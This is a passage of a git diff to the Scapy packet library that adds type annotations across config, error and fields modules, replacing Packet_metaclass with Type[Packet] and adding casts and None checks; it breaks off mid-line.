@@ def psdump(self, filename=None, **kargs): from scapy.utils import get_temp_file, ContextManagerSubprocess canvas = self.canvas_dump(**kargs) if filename is None: - fname = get_temp_file(autoext=kargs.get("suffix", ".eps")) + fname = cast(str, get_temp_file( + autoext=kargs.get("suffix", ".eps") + )) canvas.writeEPSfile(fname) if WINDOWS and conf.prog.psreader is None: os.startfile(fname) @@ -336,6 +407,7 @@ def psdump(self, filename=None, **kargs): print() def pdfdump(self, filename=None, **kargs): + # type: (Optional[str], **Any) -> None """ pdfdump(filename=None, layer_shift=0, rebuild=1) @@ -348,7 +420,9 @@ def pdfdump(self, filename=None, **kargs): from scapy.utils import get_temp_file, ContextManagerSubprocess canvas = self.canvas_dump(**kargs) if filename is None: - fname = get_temp_file(autoext=kargs.get("suffix", ".pdf")) + fname = cast(str, get_temp_file( + autoext=kargs.get("suffix", ".pdf") + )) canvas.writePDFfile(fname) if WINDOWS and conf.prog.pdfreader is None: os.startfile(fname) @@ -360,6 +434,7 @@ def pdfdump(self, filename=None, **kargs): print() def svgdump(self, filename=None, **kargs): + # type: (Optional[str], **Any) -> None """ svgdump(filename=None, layer_shift=0, rebuild=1) @@ -372,7 +447,9 @@ def svgdump(self, filename=None, **kargs): from scapy.utils import get_temp_file, ContextManagerSubprocess canvas = self.canvas_dump(**kargs) if filename is None: - fname = get_temp_file(autoext=kargs.get("suffix", ".svg")) + fname = cast(str, get_temp_file( + autoext=kargs.get("suffix", ".svg") + )) canvas.writeSVGfile(fname) if WINDOWS and conf.prog.svgreader is None: os.startfile(fname) diff --git a/scapy/config.py b/scapy/config.py index 3c1ef0937fe..a59a4e784a5 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -22,7 +22,7 @@ import scapy from scapy import VERSION -from scapy.base_classes import Packet_metaclass +from scapy.base_classes import BasePacket from scapy.consts import DARWIN, WINDOWS, LINUX, BSD, SOLARIS from scapy.error import log_scapy, warning, ScapyInvalidPlatformException from scapy.modules import six @@ -38,11 +38,17 @@ NoReturn, Optional, Set, + Type, Tuple, Union, + TYPE_CHECKING, ) from types import ModuleType +if TYPE_CHECKING: + # Do not import at runtime + from scapy.packet import Packet + ############ # Config # ############ @@ -165,8 +171,8 @@ def remove(self, *flds): self._recalc_layer_list() def __contains__(self, elt): - # type: (Packet_metaclass) -> bool - if isinstance(elt, Packet_metaclass): + # type: (Any) -> bool + if isinstance(elt, BasePacket): return elt in self.layers return elt in self.fields @@ -186,39 +192,41 @@ class Resolve(ConfigFieldList): class Num2Layer: def __init__(self): # type: () -> None - self.num2layer = {} # type: Dict[int, Packet_metaclass] - self.layer2num = {} # type: Dict[Packet_metaclass, int] + self.num2layer = {} # type: Dict[int, Type[Packet]] + self.layer2num = {} # type: Dict[Type[Packet], int] def register(self, num, layer): - # type: (int, Packet_metaclass) -> None + # type: (int, Type[Packet]) -> None self.register_num2layer(num, layer) self.register_layer2num(num, layer) def register_num2layer(self, num, layer): - # type: (int, Packet_metaclass) -> None + # type: (int, Type[Packet]) -> None self.num2layer[num] = layer def register_layer2num(self, num, layer): - # type: (int, Packet_metaclass) -> None + # type: (int, Type[Packet]) -> None self.layer2num[layer] = num def __getitem__(self, item): - # type: (Union[int, Packet_metaclass]) -> Union[int, Packet_metaclass] - if isinstance(item, Packet_metaclass): + # type: (Union[int, Type[Packet]]) -> Union[int, Type[Packet]] + if isinstance(item, int): + return self.num2layer[item] + else: return self.layer2num[item] - return self.num2layer[item] def __contains__(self, item): - # type: (int) -> bool - if isinstance(item, Packet_metaclass): + # type: (Union[int, Type[Packet]]) -> bool + if isinstance(item, int): + return item in self.num2layer + else: return item in self.layer2num - return item in self.num2layer def get(self, - item, # type: Union[int, Packet_metaclass] - default=None, # type: Optional[Packet_metaclass] + item, # type: Union[int, Type[Packet]] + default=None, # type: Optional[Type[Packet]] ): - # type: (...) -> Union[int, Packet_metaclass] + # type: (...) -> Optional[Union[int, Type[Packet]]] return self[item] if item in self else default def __repr__(self): @@ -239,14 +247,13 @@ def __repr__(self): return "\n".join(y for x, y in lst) -class LayersList(List[Packet_metaclass]): - +class LayersList(List[Type['scapy.packet.Packet']]): def __init__(self): # type: () -> None list.__init__(self) - self.ldict = {} # type: Dict[str, List[Packet_metaclass]] + self.ldict = {} # type: Dict[str, List[Type[Packet]]] self.filtered = False - self._backup_dict = {} # type: Dict[Packet_metaclass, List[Tuple[Dict[str, Any], Packet_metaclass]]] # noqa: E501 + self._backup_dict = {} # type: Dict[Type[Packet], List[Tuple[Dict[str, Any], Type[Packet]]]] # noqa: E501 def __repr__(self): # type: () -> str @@ -254,7 +261,7 @@ def __repr__(self): for layer in self) def register(self, layer): - # type: (Packet_metaclass) -> None + # type: (Type[Packet]) -> None self.append(layer) if layer.__module__ not in self.ldict: self.ldict[layer.__module__] = [] @@ -271,7 +278,7 @@ def layers(self): return result def filter(self, items): - # type: (List[Packet_metaclass]) -> None + # type: (List[Type[Packet]]) -> None """Disable dissection of unused layers to speed up dissection""" if self.filtered: raise ValueError("Already filtered. Please disable it first") @@ -685,7 +692,7 @@ class Conf(ConfClass): #: selects the default output interface for srp() and sendp(). iface = Interceptor("iface", None, _iface_changer) layers = LayersList() - commands = CommandsList() + commands = CommandsList() # type: CommandsList ASN1_default_codec = None #: Codec used by default for ASN1 objects AS_resolver = None #: choose the AS resolver class to use dot15d4_protocol = None # Used in dot15d4.py @@ -712,10 +719,10 @@ class Conf(ConfClass): #: spoof on a lan) promisc = True sniff_promisc = 1 #: default mode for sniff() - raw_layer = None # type: Packet_metaclass + raw_layer = None # type: Type[Packet] raw_summary = False - padding_layer = None # type: Packet_metaclass - default_l2 = None # type: Packet_metaclass + padding_layer = None # type: Type[Packet] + default_l2 = None # type: Type[Packet] l2types = Num2Layer() l3types = Num2Layer() L3socket = None @@ -784,8 +791,8 @@ class Conf(ConfClass): ipv6_enabled = socket.has_ipv6 #: path or list of paths where extensions are to be looked for extensions_paths = "." - stats_classic_protocols = [] # type: List[Packet_metaclass] - stats_dot11_protocols = [] # type: List[Packet_metaclass] + stats_classic_protocols = [] # type: List[Type[Packet]] + stats_dot11_protocols = [] # type: List[Type[Packet]] temp_files = [] # type: List[str] netcache = NetCache() geoip_city = None @@ -845,7 +852,7 @@ def __getattribute__(self, attr): if m in Conf.load_layers: Conf.load_layers.remove(m) -conf = Conf() +conf = Conf() # type: Conf def crypto_validator(func): diff --git a/scapy/error.py b/scapy/error.py index 43412947dcd..0fc1467fb7d 100644 --- a/scapy/error.py +++ b/scapy/error.py @@ -18,6 +18,14 @@ from scapy.consts import WINDOWS +# Typing imports +from logging import LogRecord +from scapy.compat import ( + Any, + Dict, + Tuple, +) + class Scapy_Exception(Exception): pass @@ -33,10 +41,12 @@ class ScapyNoDstMacException(Scapy_Exception): class ScapyFreqFilter(logging.Filter): def __init__(self): + # type: () -> None logging.Filter.__init__(self) - self.warning_table = {} + self.warning_table = {} # type: Dict[int, Tuple[float, int]] # noqa: E501 def filter(self, record): + # type: (LogRecord) -> bool from scapy.config import conf # Levels below INFO are not covered if record.levelno <= logging.INFO: @@ -44,8 +54,8 @@ def filter(self, record): wt = conf.warning_threshold if wt > 0: stk = traceback.extract_stack() - caller = None - for f, l, n, c in stk: + caller = 0 # type: int + for _, l, n, _ in stk: if n == 'warning': break caller = l @@ -76,6 +86,7 @@ class ScapyColoredFormatter(logging.Formatter): } def format(self, record): + # type: (LogRecord) -> str message = super(ScapyColoredFormatter, self).format(record) from scapy.config import conf message = conf.color_theme.format( @@ -119,6 +130,7 @@ def format(self, record): def warning(x, *args, **kargs): + # type: (str, *Any, **Any) -> None """ Prints a warning during runtime. """ diff --git a/scapy/extlib.py b/scapy/extlib.py index 7d8dd6aaeee..d86427a7133 100644 --- a/scapy/extlib.py +++ b/scapy/extlib.py @@ -40,6 +40,7 @@ def _test_pyx(): + # type: () -> bool """Returns if PyX is correctly installed or not""" try: with open(os.devnull, 'wb') as devnull: diff --git a/scapy/fields.py b/scapy/fields.py index 077e9fbf427..afbe6d6fbc5 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -35,13 +35,13 @@ from scapy.utils import inet_aton, inet_ntoa, lhex, mac2str, str2mac from scapy.utils6 import in6_6to4ExtractAddr, in6_isaddr6to4, \ in6_isaddrTeredo, in6_ptop, Net6, teredoAddrExtractInfo -from scapy.base_classes import BasePacket, Gen, Net, Field_metaclass, \ - Packet_metaclass +from scapy.base_classes import Gen, Net, BasePacket, Field_metaclass from scapy.error import warning import scapy.modules.six as six from scapy.modules.six.moves import range from scapy.modules.six import integer_types +# Typing imports from scapy.compat import ( Any, AnyStr, @@ -52,12 +52,18 @@ Optional, Set, Tuple, + Type, TypeVar, Union, # func cast, + TYPE_CHECKING, ) +if TYPE_CHECKING: + # Do not import on runtime ! (import loop) + from scapy.packet import Packet + """ Helper class to specify a protocol extendable for runtime modifications @@ -130,14 +136,14 @@ def __init__(self, name, default, fmt="H"): self.struct = struct.Struct(self.fmt) self.default = self.any2i(None, default) self.sz = struct.calcsize(self.fmt) # type: int - self.owners = [] # type: List[Packet_metaclass] + self.owners = [] # type: List[Type[Packet]] def register_owner(self, cls): - # type: (Packet_metaclass) -> None + # type: (Type[Packet]) -> None self.owners.append(cls) def i2len(self, - pkt, # type: BasePacket + pkt, # type: Packet x, # type: Any ): # type: (...) -> int @@ -145,28 +151,28 @@ def i2len(self, return self.sz def i2count(self, pkt, x): - # type: (Optional[BasePacket], I) -> int + # type: (Optional[Packet], I) -> int """Convert internal value to a number of elements usable by a FieldLenField. Always 1 except for list fields""" return 1 def h2i(self, pkt, x): - # type: (Optional[BasePacket], Any) -> I + # type: (Optional[Packet], Any) -> I """Convert human value to internal value""" return cast(I, x) def i2h(self, pkt, x): - # type: (Optional[BasePacket], I) -> Any + # type: (Optional[Packet], I) -> Any """Convert internal value to human value""" return x def m2i(self, pkt, x): - # type: (Optional[BasePacket], M) -> I + # type: (Optional[Packet], M) -> I """Convert machine value to internal value""" return cast(I, x) def i2m(self, pkt, x): - # type: (Optional[BasePacket], Optional[I]) -> M + # type: (Optional[Packet], Optional[I]) -> M """Convert internal value to machine value""" if x is None: return cast(M, 0) @@ -175,17 +181,17 @@ def i2m(self, pkt, x): return cast(M, x) def any2i(self, pkt, x): - # type: (Optional[BasePacket], Any) -> Optional[I] + # type: (Optional[Packet], Any) -> Optional[I] """Try to understand the most input values possible and make an internal value from them""" # noqa: E501 return self.h2i(pkt, x) def i2repr(self, pkt, x): - # type: (Optional[BasePacket], I) -> str + # type: (Optional[Packet], I) -> str """Convert internal value to a nice representation""" return repr(self.i2h(pkt, x)) def addfield(self, pkt, s, val): - # type: (BasePacket, bytes, Optional[I]) -> bytes + # type: (Packet, bytes, Optional[I]) -> bytes """Add an internal value to a string Copy the network representation of field `val` (belonging to layer @@ -194,7 +200,7 @@ def addfield(self, pkt, s, val): return s + self.struct.pack(self.i2m(pkt, val)) def getfield(self, pkt, s): - # type: (BasePacket, bytes) -> Tuple[bytes, I] + # type: (Packet, bytes) -> Tuple[bytes, I] """Extract an internal value from a string Extract from the raw packet `s` the field value belonging to layer @@ -279,7 +285,7 @@ def __init__(self, fld, action_method, **kargs): self._privdata = kargs def any2i(self, pkt, val): - # type: (Optional[BasePacket], int) -> Any + # type: (Optional[Packet], int) -> Any getattr(pkt, self._action_method)(val, self._fld, **self._privdata) return getattr(self._fld, "any2i")(pkt, val) @@ -293,25 +299,25 @@ class ConditionalField(object): def __init__(self, fld, # type: Field[Any, Any] - cond # type: Callable[[Optional[BasePacket]], bool] + cond # type: Callable[[Optional[Packet]], bool] ): # type: (...) -> None self.fld = fld self.cond = cond def _evalcond(self, pkt): - # type: (BasePacket) -> bool + # type: (Packet) -> bool return bool(self.cond(pkt)) def getfield(self, pkt, s): - # type: (BasePacket, bytes) -> Tuple[bytes, Any] + # type: (Packet, bytes) -> Tuple[bytes, Any] if self._evalcond(pkt): return self.fld.getfield(pkt, s) else: return s, None def addfield(self, pkt, s, val): - # type: (BasePacket, bytes, Any) -> bytes + # type: (Packet, bytes, Any) -> bytes if self._evalcond(pkt): return self.fld.addfield(pkt, s, val) else: @@ -363,7 +369,7 @@ def __init__(self, self.name = self.dflt.name def _iterate_fields_cond(self, pkt, val, use_val): - # type: (BasePacket, Any, bool) -> Field[Any, Any] + # type: (Optional[Packet], Any, bool) -> Field[Any, Any] """Internal function used by _find_fld_pkt & _find_fld_pkt_val""" # Iterate through the fields for fld, cond in self.flds: @@ -381,7 +387,7 @@ def _iterate_fields_cond(self, pkt, val, use_val): return self.dflt def _find_fld_pkt(self, pkt): - # type: (BasePacket) -> Field[Any, Any] + # type: (Optional[Packet]) -> Field[Any, Any] """Given a Packet instance `pkt`, returns the Field subclass to be used. If you know the value to be set (e.g., in .addfield()), use ._find_fld_pkt_val() instead. @@ -390,7 +396,7 @@ def _find_fld_pkt(self, pkt): return self._iterate_fields_cond(pkt, None, False) def _find_fld_pkt_val(self, - pkt, # type: BasePacket + pkt, # type: Optional[Packet] val, # type: Any ): # type: (...) -> Tuple[Field[Any, Any], Any] @@ -434,29 +440,29 @@ def _find_fld(self): return self.dflt def getfield(self, - pkt, # type: BasePacket + pkt, # type: Packet s, # type: bytes ): # type: (...) -> Tuple[bytes, Any] return self._find_fld_pkt(pkt).getfield(pkt, s) def addfield(self, pkt, s, val): - # type: (BasePacket, bytes, Any) -> bytes + # type: (Packet, bytes, Any) -> bytes fld, val = self._find_fld_pkt_val(pkt, val) return fld.addfield(pkt, s, val) def any2i(self, pkt, val): - # type: (BasePacket, Any) -> Any + # type: (Optional[Packet], Any) -> Any fld, val = self._find_fld_pkt_val(pkt, val) return fld.any2i(pkt, val) def h2i(self, pkt, val): - # type: (BasePacket, Any) -> Any + # type: (Optional[Packet], Any) -> Any fld, val = self._find_fld_pkt_val(pkt, val) return fld.h2i(pkt, val) def i2h(self, - pkt, # type: BasePacket + pkt, # type: Packet val, # type: Any ): # type: (...) -> Any @@ -464,22 +470,22 @@ def i2h(self, return fld.i2h(pkt, val) def i2m(self, pkt, val): - # type: (BasePacket, Optional[Any]) -> Any + # type: (Optional[Packet], Optional[Any]) -> Any fld, val = self._find_fld_pkt_val(pkt, val) return fld.i2m(pkt, val) def i2len(self, pkt, val): - # type: (BasePacket, Any) -> int + # type: (Packet, Any) -> int fld, val = self._find_fld_pkt_val(pkt, val) return fld.i2len(pkt, val) def i2repr(self, pkt, val): - # type: (BasePacket, Any) -> str + # type: (Optional[Packet], Any) -> str fld, val = self._find_fld_pkt_val(pkt, val) return fld.i2repr(pkt, val) def register_owner(self, cls): - # type: (Packet_metaclass) -> None + # type: (Type[Packet]) -> None for fld, _ in self.flds: fld.owners.append(cls) self.dflt.owners.append(cls) @@ -505,7 +511,7 @@ def padlen(self, flen): return -flen % self._align def getfield(self, - pkt, # type: BasePacket + pkt, # type: Packet s, # type: bytes ): # type: (...) -> Tuple[bytes, Any] @@ -514,7 +520,7 @@ def getfield(self, return remain[padlen:], val def addfield(self, - pkt, # type: BasePacket + pkt, # type: Packet s, # type: bytes val, # type: Any ): @@ -537,7 +543,7 @@ class ReversePadField(PadField): alignment from its beginning""" def getfield(self, - pkt, # type: BasePacket + pkt, # type: Packet s, # type: bytes ): # type: (...) -> Tuple[bytes, Any] @@ -547,7 +553,7 @@ def getfield(self, return remain, val def addfield(self, - pkt, # type: BasePacket + pkt, # type: Packet s, # type: bytes val, # type: Any ): @@ -566,48 +572,48 @@ class FCSField(Field[int, int]): """ def getfield(self, pkt, s): - # type: (BasePacket, bytes) -> Tuple[bytes, int] + # type: (Packet, bytes) -> Tuple[bytes, int] previous_post_dissect = pkt.post_dissect val = self.m2i(pkt, struct.unpack(self.fmt, s[-self.sz:])[0]) def _post_dissect(self, s): - # type: (BasePacket, bytes) -> bytes + # type: (Packet, bytes) -> bytes # Reset packet to allow post_build self.raw_packet_cache = None - self.post_dissect = previous_post_dissect - return previous_post_dissect(s) # type: ignore - pkt.post_dissect = MethodType(_post_dissect, pkt) + self.post_dissect = previous_post_dissect # type: ignore + return previous_post_dissect(s) + pkt.post_dissect = MethodType(_post_dissect, pkt) # type: ignore return s[:-self.sz], val def addfield(self, pkt, s, val): - # type: (BasePacket, bytes, Optional[int]) -> bytes + # type: (Packet, bytes, Optional[int]) -> bytes previous_post_build = pkt.post_build value = struct.pack(self.fmt, self.i2m(pkt, val)) def _post_build(self, p, pay): - # type: (BasePacket, bytes, bytes) -> bytes + # type: (Packet, bytes, bytes) -> bytes pay += value - self.post_build = previous_post_build - return previous_post_build(p, pay) # type: ignore - pkt.post_build = MethodType(_post_build, pkt) + self.post_build = previous_post_build # type: ignore + return previous_post_build(p, pay) + pkt.post_build = MethodType(_post_build, pkt) # type: ignore return s def i2repr(self, pkt, x): - # type: (BasePacket, int) -> str + # type: (Optional[Packet], int) -> str return lhex(self.i2h(pkt, x)) class DestField(Field[str, bytes]): __slots__ = ["defaultdst"] # Each subclass must have its own bindings attribute - bindings = {} # type: Dict[Packet_metaclass, Tuple[str, Any]] + bindings = {} # type: Dict[Type[Packet], Tuple[str, Any]] def __init__(self, name, default): # type: (str, str) -> None self.defaultdst = default def dst_from_pkt(self, pkt): - # type: (BasePacket) -> str + # type: (Packet) -> str for addr, condition in self.bindings.get(pkt.payload.__class__, []): try: if all(pkt.payload.getfieldval(field) == value @@ -619,7 +625,7 @@ def dst_from_pkt(self, pkt): @classmethod def bind_addr(cls, layer, addr, **condition): - # type: (Packet_metaclass, str, **Any) -> None + # type: (Type[Packet], str, **Any) -> None cls.bindings.setdefault(layer, []).append( # type: ignore (addr, condition) ) @@ -631,7 +637,7 @@ def __init__(self, name, default): Field.__init__(self, name, default, "6s") def i2m(self, pkt, x): - # type: (BasePacket, Optional[str]) -> bytes + # type: (Optional[Packet], Optional[str]) -> bytes if x is None: return b"\0\0\0\0\0\0" try: @@ -641,17 +647,17 @@ def i2m(self, pkt, x): return y def m2i(self, pkt, x): - # type: (Optional[BasePacket], bytes) -> str + # type: (Optional[Packet], bytes) -> str return str2mac(x) def any2i(self, pkt, x): - # type: (BasePacket, Any) -> str + # type: (Optional[Packet], Any) -> str if isinstance(x, bytes) and len(x) == 6: return self.m2i(pkt, x) return cast(str, x) def i2repr(self, pkt, x): - # type: (BasePacket, str) -> str + # type: (Optional[Packet], str) -> str x = self.i2h(pkt, x) if self in conf.resolve: x = conf.manufdb._resolve_MAC(x) @@ -668,20 +674,20 @@ def __init__(self, name, default): Field.__init__(self, name, default, "4s") def h2i(self, pkt, x): - # type: (BasePacket, Union[AnyStr, List[AnyStr]]) -> Any + # type: (Optional[Packet], Union[AnyStr, List[AnyStr]]) -> Any if isinstance(x, bytes): x = plain_str(x) # type: ignore if isinstance(x, str): try: inet_aton(x) except socket.error: - x = Net(x) + return Net(x) elif isinstance(x, list): - x = [self.h2i(pkt, n) for n in x] + return [self.h2i(pkt, n) for n in x] return x def i2h(self, pkt, x): - # type: (BasePacket, Optional[str]) -> str + # type: (Optional[Packet], Optional[str]) -> str return cast(str, x) def resolve(self, x): @@ -697,21 +703,21 @@ def resolve(self, x): return x def i2m(self, pkt, x): - # type: (Optional[BasePacket], Optional[str]) -> bytes + # type: (Optional[Packet], Optional[str]) -> bytes if x is None: return b'\x00\x00\x00\x00' return inet_aton(plain_str(x)) def m2i(self, pkt, x): - # type: (Optional[BasePacket], bytes) -> str + # type: (Optional[Packet], bytes) -> str return inet_ntoa(x) def any2i(self, pkt, x): - # type: (Optional[BasePacket], Any) -> Any + # type: (Optional[Packet], Any) -> Any return self.h2i(pkt, x) def i2repr(self, pkt, x): - # type: (Optional[BasePacket], str) -> str + # type: (Optional[Packet], str) -> str r = self.resolve(self.i2h(pkt, x)) return r if isinstance(r, str) else repr(r) @@ -729,7 +735,7 @@ def __init__(self, name, dstname): self.dstname = dstname def __findaddr(self, pkt): - # type: (BasePacket) -> str + # type: (Packet) -> str if conf.route is None: # unused import, only to initialize conf.route import scapy.route # noqa: F401 @@ -746,14 +752,14 @@ def __findaddr(self, pkt): return conf.route.route(dst)[1] def i2m(self, pkt, x): - # type: (BasePacket, Optional[str]) -> bytes - if x is None: + # type: (Optional[Packet], Optional[str]) -> bytes + if x is None and pkt is not None: x = self.__findaddr(pkt) return super(SourceIPField, self).i2m(pkt, x) def i2h(self, pkt, x): - # type: (BasePacket, Optional[str]) -> str - if x is None: + # type: (Optional[Packet], Optional[str]) -> str + if x is None and pkt is not None: x = self.__findaddr(pkt) return super(SourceIPField, self).i2h(pkt, x) @@ -764,7 +770,7 @@ def __init__(self, name, default): Field.__init__(self, name, default, "16s") def h2i(self, pkt, x): - # type: (BasePacket, Optional[str]) -> str + # type: (Optional[Packet], Optional[str]) -> str if isinstance(x, bytes): x = plain_str(x) if isinstance(x, str): @@ -777,25 +783,25 @@ def h2i(self, pkt, x): return x # type: ignore def i2h(self, pkt, x): - # type: (BasePacket, Optional[str]) -> str + # type: (Optional[Packet], Optional[str]) -> str return cast(str, x) def i2m(self, pkt, x): - # type: (Optional[BasePacket], Optional[str]) -> bytes + # type: (Optional[Packet], Optional[str]) -> bytes if x is None: x = "::" return inet_pton(socket.AF_INET6, plain_str(x)) def m2i(self, pkt, x): - # type: (Optional[BasePacket], bytes) -> str + # type: (Optional[Packet], bytes) -> str return inet_ntop(socket.AF_INET6, x) def any2i(self, pkt, x): - # type: (Optional[BasePacket], Optional[str]) -> str + # type: (Optional[Packet], Optional[str]) -> str return self.h2i(pkt, x) def i2repr(self, pkt, x): - # type: (BasePacket, Optional[str]) -> str + # type: (Optional[Packet], Optional[str]) -> str if x is None: return self.i2h(pkt, x) elif not isinstance(x, Net6) and not isinstance(x, list): @@ -822,7 +828,7 @@ def __init__(self, name, dstname): self.dstname = dstname def i2m(self, pkt, x): - # type: (BasePacket, Optional[str]) -> bytes + # type: (Optional[Packet], Optional[str]) -> bytes if x is None: dst = ("::" if self.dstname is None else getattr(pkt, self.dstname) or "::") @@ -830,7 +836,7 @@ def i2m(self, pkt, x): return super(SourceIP6Field, self).i2m(pkt, x) def i2h(self, pkt, x): - # type: (BasePacket, Optional[str]) -> str + # type: (Optional[Packet], Optional[str]) -> str if x is None: if conf.route6 is None: # unused import, only to initialize conf.route6 @@ -848,7 +854,7 @@ def i2h(self, pkt, x): class DestIP6Field(IP6Field, DestField): - bindings = {} # type: Dict[Packet_metaclass, Tuple[str, Any]] + bindings = {} # type: Dict[Type[Packet], Tuple[str, Any]] def __init__(self, name, default): # type: (str, str) -> None @@ -856,14 +862,14 @@ def __init__(self, name, default): DestField.__init__(self, name, default) def i2m(self, pkt, x): - # type: (BasePacket, Optional[str]) -> bytes - if x is None: + # type: (Optional[Packet], Optional[str]) -> bytes + if x is None and pkt is not None: x = self.dst_from_pkt(pkt) return IP6Field.i2m(self, pkt, x) def i2h(self, pkt, x): - # type: (BasePacket, Optional[str]) -> str - if x is None: + # type: (Optional[Packet], Optional[str]) -> str + if x is None and pkt is not None: x = self.dst_from_pkt(pkt) return super(DestIP6Field, self).i2h(pkt, x) @@ -876,34 +882,34 @@ def __init__(self, name, default): class XByteField(ByteField): def i2repr(self, pkt, x): - # type: (Optional[BasePacket], int) -> str + # type: (Optional[Packet], int) -> str return lhex(self.i2h(pkt, x)) # XXX Unused field: at least add some tests class OByteField(ByteField): def i2repr(self, pkt, x): - # type: (Optional[BasePacket], int) -> str + # type: (Optional[Packet], int) -> str return "%03o" % self.i2h(pkt, x) -class ThreeBytesField(ByteField): +class ThreeBytesField(Field[int, int]): def __init__(self, name, default): - # type: (Optional[BasePacket], str, Optional[int]) -> None - Field.__init__(self, name, default, "!I") # type: ignore + # type: (str, int) -> None + Field.__init__(self, name, default, "!I") def addfield(self, pkt, s, val): - # type: (BasePacket, bytes, Optional[int]) -> bytes + # type: (Packet, bytes, Optional[int]) -> bytes return s + struct.pack(self.fmt, self.i2m(pkt, val))[1:4] def getfield(self, pkt, s): - # type: (BasePacket, bytes) -> Tuple[bytes, int] + # type: (Packet, bytes) -> Tuple[bytes, int] return s[3:], self.m2i(pkt, struct.unpack(self.fmt, b"\x00" + s[:3])[0]) # noqa: E501 class X3BytesField(ThreeBytesField, XByteField): def i2repr(self, pkt, x): - # type: (Optional[BasePacket], int) -> str + # type: (Optional[Packet], int) -> str return XByteField.i2repr(self, pkt, x) @@ -913,17 +919,17 @@ def __init__(self, name, default): Field.__init__(self, name, default, " bytes + # type: (Packet, bytes, Optional[int]) -> bytes return s + struct.pack(self.fmt, self.i2m(pkt, val))[:3] def getfield(self, pkt, s): - # type: (Optional[BasePacket], bytes) -> Tuple[bytes, int] + # type: (Optional[Packet], bytes) -> Tuple[bytes, int] return s[3:], self.m2i(pkt, struct.unpack(self.fmt, s[:3] + b"\x00")[0]) # noqa: E501 class LEX3BytesField(LEThreeBytesField, XByteField): def i2repr(self, pkt, x): - # type: (Optional[BasePacket], int) -> str + # type: (Optional[Packet], int) -> str return XByteField.i2repr(self, pkt, x) @@ -933,7 +939,7 @@ def __init__(self, name, default, sz): Field.__init__(self, name, default, "<" + "B" * sz) def i2m(self, pkt, x): - # type: (Optional[BasePacket], Optional[int]) -> List[int] + # type: (Optional[Packet], Optional[int]) -> List[int] if x is None: return [] x2m = list() @@ -943,7 +949,7 @@ def i2m(self, pkt, x): return x2m[::-1] def m2i(self, pkt, x): - # type: (Optional[BasePacket], Union[List[int], int]) -> int + # type: (Optional[Packet], Union[List[int], int]) -> int if isinstance(x, int): return x # x can be a tuple when coming from struct.unpack (from getfield) @@ -952,24 +958,24 @@ def m2i(self, pkt, x): return 0 def i2repr(self, pkt, x): - # type: (Optional[BasePacket], int) -> str + # type: (Optional[Packet], int) -> str if isinstance(x, integer_types): return '%i' % x return super(NBytesField, self).i2repr(pkt, x) def addfield(self, pkt, s, val): - # type: (Optional[BasePacket], bytes, Optional[int]) -> bytes + # type: (Optional[Packet], bytes, Optional[int]) -> bytes return s + self.struct.pack(*self.i2m(pkt, val)) def getfield(self, pkt, s): - # type: (Optional[BasePacket], bytes) -> Tuple[bytes, int] + # type: (Optional[Packet], bytes) -> Tuple[bytes, int] return (s[self.sz:], self.m2i(pkt, self.struct.unpack(s[:self.sz]))) # type: ignore class XNBytesField(NBytesField): def i2repr(self, pkt, x): - # type: (Optional[BasePacket], int) -> str + # type: (Optional[Packet], int) -> str if isinstance(x, integer_types): return '0x%x' % x # x can be a tuple when coming from struct.unpack (from getfield) @@ -1102,7 +1108,7 @@ def __init__(self, name, default, config=None): ByteField.__init__(self, name, default) def i2repr(self, pkt, x): - # type: (Optional[BasePacket], int) -> str + # type: (Optional[Packet], int) -> str return self.eval_fn(x) # type: ignore @@ -1132,7 +1138,7 @@ def __init__(self, name, default): class XShortField(ShortField): def i2repr(self, pkt, x): - # type: (Optional[BasePacket], int) -> str + # type: (Optional[Packet], int) -> str return lhex(self.i2h(pkt, x)) @@ -1162,19 +1168,19 @@ def __init__(self, name, default): class XIntField(IntField): def i2repr(self, pkt, x): - # type: (Optional[BasePacket], int) -> str + # type: (Optional[Packet], int) -> str return lhex(self.i2h(pkt, x)) class XLEIntField(LEIntField, XIntField): def i2repr(self, pkt, x): - # type: (Optional[BasePacket], int) -> str + # type: (Optional[Packet], int) -> str return XIntField.i2repr(self, pkt, x) class XLEShortField(LEShortField, XShortField): def i2repr(self, pkt, x): - # type: (Optional[BasePacket], int) -> str + # type: (Optional[Packet], int) -> str return XShortField.i2repr(self, pkt, x) @@ -1204,13 +1210,13 @@ def __init__(self, name, default): class XLongField(LongField): def i2repr(self, pkt, x): - # type: (Optional[BasePacket], int) -> str + # type: (Optional[Packet], int) -> str return lhex(self.i2h(pkt, x)) class XLELongField(LELongField, XLongField): def i2repr(self, pkt, x): - # type: (Optional[BasePacket], int) -> str + # type: (Optional[Packet], int) -> str return XLongField.i2repr(self, pkt, x) @@ -1235,24 +1241,24 @@ def __init__(self, name, default, fmt="H", remain=0): self.remain = remain def i2len(self, pkt, x): - # type: (Optional[BasePacket], Any) -> int + # type: (Optional[Packet], Any) -> int return len(x) def any2i(self, pkt, x): - # type: (Optional[BasePacket], Any) -> I + # type: (Optional[Packet], Any) -> I if isinstance(x, six.text_type): x = bytes_encode(x) return super(_StrField, self).any2i(pkt, x) # type: ignore def i2repr(self, pkt, x): - # type: (Optional[BasePacket], I) -> str + # type: (Optional[Packet], I) -> str val = super(_StrField, self).i2repr(pkt, x) if val[:2] in ['b"', "b'"]: return val[1:] return val def i2m(self, pkt, x): - # type: (Optional[BasePacket], Optional[I]) -> bytes + # type: (Optional[Packet], Optional[I]) -> bytes if x is None: return b"" if not isinstance(x, bytes): @@ -1260,11 +1266,11 @@ def i2m(self, pkt, x): return x def addfield(self, pkt, s, val): - # type: (Optional[BasePacket], bytes, Optional[I]) -> bytes + # type: (Packet, bytes, Optional[I]) -> bytes return s + self.i2m(pkt, val) def getfield(self, pkt, s): - # type: (Optional[BasePacket], bytes) -> Tuple[bytes, I] + # type: (Packet, bytes) -> Tuple[bytes, I] if self.remain == 0: return b"", self.m2i(pkt, s) else: @@ -1281,21 +1287,21 @@ class StrField(_StrField[bytes]): class StrFieldUtf16(StrField): def h2i(self, pkt, x): - # type: (Optional[BasePacket], Optional[str]) -> bytes + # type: (Optional[Packet], Optional[str]) -> bytes return plain_str(x).encode('utf-16')[2:] def any2i(self, pkt, x): - # type: (Optional[BasePacket], Optional[str]) -> bytes + # type: (Optional[Packet], Optional[str]) -> bytes if isinstance(x, six.text_type): return self.h2i(pkt, x) return super(StrFieldUtf16, self).any2i(pkt, x) def i2repr(self, pkt, x): - # type: (Optional[BasePacket], bytes) -> str + # type: (Optional[Packet], bytes) -> str return plain_str(x) def i2h(self, pkt, x): - # type: (Optional[BasePacket], bytes) -> str + # type: 